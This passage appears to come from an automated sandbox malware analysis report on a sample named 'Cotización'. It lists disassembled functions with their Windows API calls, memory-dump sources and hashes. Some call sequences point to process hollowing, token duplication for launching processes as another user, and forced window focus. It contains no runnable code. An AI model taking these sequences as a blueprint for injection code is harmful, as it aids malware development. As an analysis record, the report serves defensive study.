                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: ClearVariant
                • String ID:
                • API String ID: 1473721057-0
                • Opcode ID: 026107fac7c7bcdbca34bd1b77142632d6848c7cf36883952a1fde06c325d7df
                • Instruction ID: 76271617df0236ab3ccd2777984eb13d60b28668e4953fb9a85eec064aa2abc3
                • Opcode Fuzzy Hash: 026107fac7c7bcdbca34bd1b77142632d6848c7cf36883952a1fde06c325d7df
                • Instruction Fuzzy Hash: F891A370A00204DFDB14DF65D884AAAB3B5EF09304F24C56BE915AB391D739EC41CBAE
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: _memmove
                • String ID:
                • API String ID: 4104443479-0
                • Opcode ID: 275534035a012e7ef0db215d78f24564d6aa5c775b6c55b3817692144b07e5e7
                • Instruction ID: 2565b1472f88146c75409e19c065a4aacb94a5f6c219594ae44f545f2623c2f3
                • Opcode Fuzzy Hash: 275534035a012e7ef0db215d78f24564d6aa5c775b6c55b3817692144b07e5e7
                • Instruction Fuzzy Hash: 85412871D00104AFDB10AF15C881BAE7B74AF4670CF14C05AFA055B342E63DA946CBAA
                APIs
                  • Part of subcall function 0040F6F0: _wcslen.LIBCMT ref: 0040F705
                  • Part of subcall function 0040F6F0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,00454478,?,00000000,?,?), ref: 0040F71E
                  • Part of subcall function 0040F6F0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,00000000,?,?,?,?), ref: 0040F747
                • _strcat.LIBCMT ref: 0040F786
                  • Part of subcall function 0040F850: _strlen.LIBCMT ref: 0040F858
                  • Part of subcall function 0040F850: _sprintf.LIBCMT ref: 0040F9AE
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: ByteCharMultiWide$_sprintf_strcat_strlen_wcslen
                • String ID:
                • API String ID: 3199840319-0
                • Opcode ID: 49a3294527d5b305cfbd6c685c74412098d504eb7a2552fd7b1e5b305baf6987
                • Instruction ID: aac9d08775c2cbfae45fd546c2dd5c585d34072f6b495fb7426f91ad36779b1c
                • Opcode Fuzzy Hash: 49a3294527d5b305cfbd6c685c74412098d504eb7a2552fd7b1e5b305baf6987
                • Instruction Fuzzy Hash: 7B2148B260825027D724EF3A9C82A6EF2D4AF85304F14893FF555C22C2F738D554879A
                APIs
                  • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                • __lock_file.LIBCMT ref: 00414A8D
                  • Part of subcall function 00415471: __lock.LIBCMT ref: 00415496
                • __fclose_nolock.LIBCMT ref: 00414A98
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                • String ID:
                • API String ID: 2800547568-0
                • Opcode ID: a5ee4eb6f63f5c531cf15d6f0d52328148e0080a1a420ce895dcb566fcff73ac
                • Instruction ID: d9443fdd3ee0a3059f5d17ec53abbfe2105cc8a5d10ddad395bff0ae1f283336
                • Opcode Fuzzy Hash: a5ee4eb6f63f5c531cf15d6f0d52328148e0080a1a420ce895dcb566fcff73ac
                • Instruction Fuzzy Hash: EEF0F6308417019AD710AB7588027EF37A09F41379F22864FA061961D1C73C85C29B5D
                APIs
                • __lock_file.LIBCMT ref: 00415012
                • __ftell_nolock.LIBCMT ref: 0041501F
                  • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: __ftell_nolock__getptd_noexit__lock_file
                • String ID:
                • API String ID: 2999321469-0
                • Opcode ID: 5d7fd30e9bb4e6974f03027405c635b91b5e55acacb14f372dcacdb3af77c648
                • Instruction ID: e3e7bc223609ce985a1750c66bb322057640979a4505571362f253753ce4bf01
                • Opcode Fuzzy Hash: 5d7fd30e9bb4e6974f03027405c635b91b5e55acacb14f372dcacdb3af77c648
                • Instruction Fuzzy Hash: 64F03030900605EADB107FB5DD027EE3B70AF443A8F20825BB0259A0E1DB7C8AC29A59
                APIs
                • CreateProcessW.KERNELBASE(?,00000000), ref: 0406B69B
                • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 0406B731
                • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 0406B753
                Memory Dump Source
                • Source File: 00000000.00000002.1329743365.0000000004069000.00000040.00000020.00020000.00000000.sdmp, Offset: 04069000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4069000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: Process$ContextCreateMemoryReadThreadWow64
                • String ID:
                • API String ID: 2438371351-0
                • Opcode ID: 47f45bba1b7d6f78db91ee930b61901a72fbf3bd75938062ef2b5451d70cd9db
                • Instruction ID: 80987ba60e71e1cfc9b8d8ba087af4314ca3f67693a7a0d7ed24d2a2690cdfe3
                • Opcode Fuzzy Hash: 47f45bba1b7d6f78db91ee930b61901a72fbf3bd75938062ef2b5451d70cd9db
                • Instruction Fuzzy Hash: 8512EF24E24658C6EB24DF64D8507DEB272EF68300F1090E9910DEB7A4E77A5F81CF5A
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: _memmove
                • String ID:
                • API String ID: 4104443479-0
                • Opcode ID: 224a1bccd0668171228bffd00b4e167e84225026459a60d9317a1c29c8a59c26
                • Instruction ID: 6397ebbfaf442e519c955e074037b65107783079284990db5ef0c3dd021860ed
                • Opcode Fuzzy Hash: 224a1bccd0668171228bffd00b4e167e84225026459a60d9317a1c29c8a59c26
                • Instruction Fuzzy Hash: 36317371E00209EBDF009F52E9866AEFBF4FF40740F2189BED855E2650E7389990D759
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: _memmove
                • String ID:
                • API String ID: 4104443479-0
                • Opcode ID: 8b2818c8434b9a070bb7a9b9dd55d4aa8d61190f7c46d4f62081b3e0e63eee4f
                • Instruction ID: 412edbf2df7bf8c64f36b821a583ca4e96a0f18e0b9aed18a790d0e499aeb9a1
                • Opcode Fuzzy Hash: 8b2818c8434b9a070bb7a9b9dd55d4aa8d61190f7c46d4f62081b3e0e63eee4f
                • Instruction Fuzzy Hash: 60319CB9600A21EFC714DF19C580A62F7E0FF08310B14C57ADA89CB795E774E892CB99
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: ProtectVirtual
                • String ID:
                • API String ID: 544645111-0
                • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                • Instruction ID: 21b87f0337b3904faf2e49e7d89a80b8c5538d611ad57d97d778efbd48141229
                • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                • Instruction Fuzzy Hash: 8131F770A00105DBC718DF88E590AAAF7B1FB49310B6486A6E409CF355DB78EDC1CBD9
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: e5559574dc10eca8e97d8025a500eef8ee7d185e3c773571fee143e03780f234
                • Instruction ID: 427b4a632c312742ac0951887501238d3178a51c37fde1d0fd35c98815df3d2a
                • Opcode Fuzzy Hash: e5559574dc10eca8e97d8025a500eef8ee7d185e3c773571fee143e03780f234
                • Instruction Fuzzy Hash: 21119674200201ABDB249F36D984E26B3A5AF45304B244D2FF9C5D7790DB7CE881DB5E
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: __lock_file
                • String ID:
                • API String ID: 3031932315-0
                • Opcode ID: 9d46abaf5bc0bef18357e8259ddf310e5220bee08d011669e2131a09b3543261
                • Instruction ID: 324047821ed349453e17c5e7f52af34d31ade4ebcb64e32b23ce3c6ad3b356a0
                • Opcode Fuzzy Hash: 9d46abaf5bc0bef18357e8259ddf310e5220bee08d011669e2131a09b3543261
                • Instruction Fuzzy Hash: FF011E71801219EBCF21AFA5C8028DF7B71AF44764F11851BF824551A1E7398AE2DBD9
                APIs
                  • Part of subcall function 00479500: VariantInit.OLEAUT32(?), ref: 0047950F
                  • Part of subcall function 00437063: VariantClear.OLEAUT32(00479459), ref: 0043706B
                  • Part of subcall function 00437063: VariantCopy.OLEAUT32(00479459,00470E7C), ref: 00437076
                • VariantClear.OLEAUT32(?), ref: 0047973E
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: Variant$Clear$CopyInit
                • String ID:
                • API String ID: 24293632-0
                • Opcode ID: 5d7337fccf444792d50b64af1a389de1ebb3e8953e67bf22bf250c0f7ac223aa
                • Instruction ID: ce75823fad5ab463881ca656a32c684f825172ff923cb7d6b6c05433a05b9d1b
                • Opcode Fuzzy Hash: 5d7337fccf444792d50b64af1a389de1ebb3e8953e67bf22bf250c0f7ac223aa
                • Instruction Fuzzy Hash: C4E012B251010C6B8704FBFDDDC6CAFB7BCFB18204B80495DB919A3142EA75A914C7E9
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: __wfsopen
                • String ID:
                • API String ID: 197181222-0
                • Opcode ID: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
                • Instruction ID: b34ddb7a850719c89311ce964fc9f65e9e9400c6a390d5c1cbb008c3125e494a
                • Opcode Fuzzy Hash: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
                • Instruction Fuzzy Hash: 82C092B244020C77CF112A93EC02F9A3F1E9BC0764F058021FB1C1A162AA77EAA19689
                APIs
                • Sleep.KERNELBASE(000001F4), ref: 0406BEF1
                Memory Dump Source
                • Source File: 00000000.00000002.1329743365.0000000004069000.00000040.00000020.00020000.00000000.sdmp, Offset: 04069000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4069000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: Sleep
                • String ID:
                • API String ID: 3472027048-0
                • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                • Instruction ID: be6138ca669a9a4682c1f885a0bbcd7b4e726b1e9fe253f915f87cd739dffdfe
                • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                • Instruction Fuzzy Hash: A3E0E67494410DDFDB00EFB4D54969E7FB4EF04301F100565FD02E2291D7309D509A72
                APIs
                • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C8E1
                • DefDlgProcW.USER32(?,0000004E,?,?), ref: 0047C8FC
                • GetKeyState.USER32(00000011), ref: 0047C92D
                • GetKeyState.USER32(00000009), ref: 0047C936
                • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C949
                • GetKeyState.USER32(00000010), ref: 0047C953
                • GetWindowLongW.USER32(00000002,000000F0), ref: 0047C967
                • SendMessageW.USER32(00000002,0000110A,00000009,00000000), ref: 0047C993
                • SendMessageW.USER32(00000002,0000113E,00000000,?), ref: 0047C9B6
                • _wcsncpy.LIBCMT ref: 0047CA29
                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0047CA5A
                • SendMessageW.USER32 ref: 0047CA7F
                • InvalidateRect.USER32(?,00000000,00000001), ref: 0047CADF
                • SendMessageW.USER32(?,00001030,?,0047EA68), ref: 0047CB84
                • ImageList_SetDragCursorImage.COMCTL32(00C3EE88,00000000,00000000,00000000), ref: 0047CB9B
                • ImageList_BeginDrag.COMCTL32(00C3EE88,00000000,000000F8,000000F0), ref: 0047CBAC
                • SetCapture.USER32(?), ref: 0047CBB6
                • ClientToScreen.USER32(?,?), ref: 0047CC17
                • ImageList_DragEnter.COMCTL32(00000000,?,?,?,?), ref: 0047CC26
                • ReleaseCapture.USER32 ref: 0047CC3A
                • GetCursorPos.USER32(?), ref: 0047CC72
                • ScreenToClient.USER32(?,?), ref: 0047CC80
                • SendMessageW.USER32(?,00001012,00000000,?), ref: 0047CCE6
                • SendMessageW.USER32 ref: 0047CD12
                • SendMessageW.USER32(?,00001111,00000000,?), ref: 0047CD53
                • SendMessageW.USER32 ref: 0047CD80
                • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0047CD99
                • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0047CDAA
                • GetCursorPos.USER32(?), ref: 0047CDC8
                • ScreenToClient.USER32(?,?), ref: 0047CDD6
                • GetParent.USER32(00000000), ref: 0047CDF7
                • SendMessageW.USER32(?,00001012,00000000,?), ref: 0047CE60
                • SendMessageW.USER32 ref: 0047CE93
                • ClientToScreen.USER32(?,?), ref: 0047CEEE
                • TrackPopupMenuEx.USER32(?,00000000,?,?,02F81AC0,00000000,?,?,?,?), ref: 0047CF1C
                • SendMessageW.USER32(?,00001111,00000000,?), ref: 0047CF46
                • SendMessageW.USER32 ref: 0047CF6B
                • ClientToScreen.USER32(?,?), ref: 0047CFB5
                • TrackPopupMenuEx.USER32(?,00000080,?,?,02F81AC0,00000000,?,?,?,?), ref: 0047CFE6
                • GetWindowLongW.USER32(?,000000F0), ref: 0047D086
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: MessageSend$ClientScreen$Image$CursorDragList_State$CaptureLongMenuPopupTrackWindow$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                • String ID: @GUI_DRAGID$F
                • API String ID: 3100379633-4164748364
                • Opcode ID: 2b9e17ba3223fb7b4804536e302a42d427f78481ee09a8534aafb1e4469c1a6d
                • Instruction ID: 980357f173c9be8e312ccaa606797ee7157b6525bda81ee0817efdfc4c954517
                • Opcode Fuzzy Hash: 2b9e17ba3223fb7b4804536e302a42d427f78481ee09a8534aafb1e4469c1a6d
                • Instruction Fuzzy Hash: F842AD706043419FD714DF28C884FABB7A5FF89700F14865EFA489B291C7B8E846CB5A
                APIs
                • GetForegroundWindow.USER32 ref: 00434420
                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00434446
                • IsIconic.USER32(?), ref: 0043444F
                • ShowWindow.USER32(?,00000009), ref: 0043445C
                • SetForegroundWindow.USER32(?), ref: 0043446A
                • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434481
                • GetCurrentThreadId.KERNEL32 ref: 00434485
                • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434493
                • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A2
                • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A8
                • AttachThreadInput.USER32(00000000,?,00000001), ref: 004344B1
                • SetForegroundWindow.USER32(00000000), ref: 004344B7
                • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344C6
                • keybd_event.USER32(00000012,00000000), ref: 004344CF
                • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344DD
                • keybd_event.USER32(00000012,00000000), ref: 004344E6
                • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344F4
                • keybd_event.USER32(00000012,00000000), ref: 004344FD
                • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043450B
                • keybd_event.USER32(00000012,00000000), ref: 00434514
                • SetForegroundWindow.USER32(00000000), ref: 0043451E
                • AttachThreadInput.USER32(00000000,?,00000000), ref: 0043453F
                • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434545
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1327742708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1327726853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327788359.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327810684.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327829018.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327846228.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1327882339.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3n.jbxd
                Similarity
                • API ID: ThreadWindow$AttachInput$ForegroundVirtualkeybd_event$Process$CurrentFindIconicShow
                • String ID: Shell_TrayWnd
                • API String ID: 2889586943-2988720461
                • Opcode ID: 8fb90041bee2e10260771149cd23f534c9f7767a381d567acbe6a88cba9e6a8e
                • Instruction ID: 0b42b206f44700a00bd4aa1610e9651ae8f7722fee000eb3c659fd44b6abead8
                • Opcode Fuzzy Hash: 8fb90041bee2e10260771149cd23f534c9f7767a381d567acbe6a88cba9e6a8e
                • Instruction Fuzzy Hash: AD416272640218BFE7205BA4DE4AFBE7B6CDB58B11F10442EFA01EA1D0D6F458419BA9
                APIs
                • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 0044638E
                • CloseHandle.KERNEL32(?), ref: 004463A0
                • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 004463B8
                • GetProcessWindowStation.USER32 ref: 004463D1
                • SetProcessWindowStation.USER32(00000000), ref: 004463DB
                • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 004463F7
                • _wcslen.LIBCMT ref: 00446498
                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                • _wcsncpy.LIBCMT ref: 004464C0
                • LoadUserProfileW.USERENV(?,00000020), ref: 004464D9
                • CreateEnvironmentBlock.USERENV(?,?,00000000), ref: 004464F3
                • CreateProcessAsUserW.ADVAPI32(?,00000000,00000000,00000000,00000000,?,?,?,?,000F01FF,00000400), ref: 00446522
                • UnloadUserProfile.USERENV(?,?), ref: 00446555
                • CloseWindowStation.USER32(00000000), ref: 0044656C
